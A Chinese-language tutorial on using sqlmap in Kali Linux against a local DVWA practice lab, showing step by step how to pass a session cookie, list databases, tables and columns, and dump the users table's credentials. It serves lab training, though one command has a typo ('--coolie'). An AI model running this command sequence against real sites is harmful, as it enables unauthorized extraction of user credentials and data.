7.12、SQLmap—自动化渗透测试工具(kali linux)

目录

一、准备工作

二、检测漏洞

第一步:获取待检测的url

第二步:获取cookie

第三步:生成命令行

三、获取数据库名

四、获取指定数据库表

五、获取指定数据库列/表项

六、获取数据


        sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。

一、准备工作

       1)kali操作系统自带sqlmap,可以直接输入sqlmap执行。

7.12、SQLmap—自动化渗透测试工具(kali linux)_第1张图片

        2)启动apache2和mysql服务

        service apache2 start        # 启动apache2
        service mysql start            # 启动mysql

        3)打开DVWA靶场,将防御等级设置为low

7.12、SQLmap—自动化渗透测试工具(kali linux)_第2张图片

二、检测漏洞

        命令行:sqlmap -u "要检查的网址"  --cookie ="网站登录后,后端返回的cookie值 

        cookie:登录凭证

第一步:获取待检测的url

        http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

7.12、SQLmap—自动化渗透测试工具(kali linux)_第3张图片

第二步:获取cookie

        回到DVWA按:F12  # 进入开发者模式

        security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2

7.12、SQLmap—自动化渗透测试工具(kali linux)_第4张图片

第三步:生成命令行

        该命令行输入到虚拟机的命令框中务必自己输入,不要复制粘贴!!!

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --coolie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2"

7.12、SQLmap—自动化渗透测试工具(kali linux)_第5张图片

7.12、SQLmap—自动化渗透测试工具(kali linux)_第6张图片

三、获取数据库名

        在第一步检测的的命令后面加上:--dbs     

        dbs:database server获取所有数据库名

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" --dbs

7.12、SQLmap—自动化渗透测试工具(kali linux)_第7张图片

四、获取指定数据库表

        在第一步检测的的命令后面加上:-D 数据库名称 --tables         

        -D(Database)指定想要获取的数据库名

        --tables 枚举(遍历)DBMS数据库中的表

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa --tables  

7.12、SQLmap—自动化渗透测试工具(kali linux)_第8张图片

五、获取指定数据库列/表项

        在第一步检测的的命令后面加上:-D 数据库名 -T 数据库的表名 --columns  

        --columns 列出表项/例

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --columns 

7.12、SQLmap—自动化渗透测试工具(kali linux)_第9张图片

六、获取数据

        把第五步命令后面的--columns换成:--dump  # 读取数据

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --dump

7.12、SQLmap—自动化渗透测试工具(kali linux)_第10张图片

7.12、SQLmap—自动化渗透测试工具(kali linux)_第11张图片

7.12、SQLmap—自动化渗透测试工具(kali linux)_第12张图片

很慢~,等待中ing

7.12、SQLmap—自动化渗透测试工具(kali linux)_第13张图片

爆破到dvwa数据库中user表的用户名及密码,结束!

你可能感兴趣的:(网络安全,自动化,测试工具,运维,网络,linux)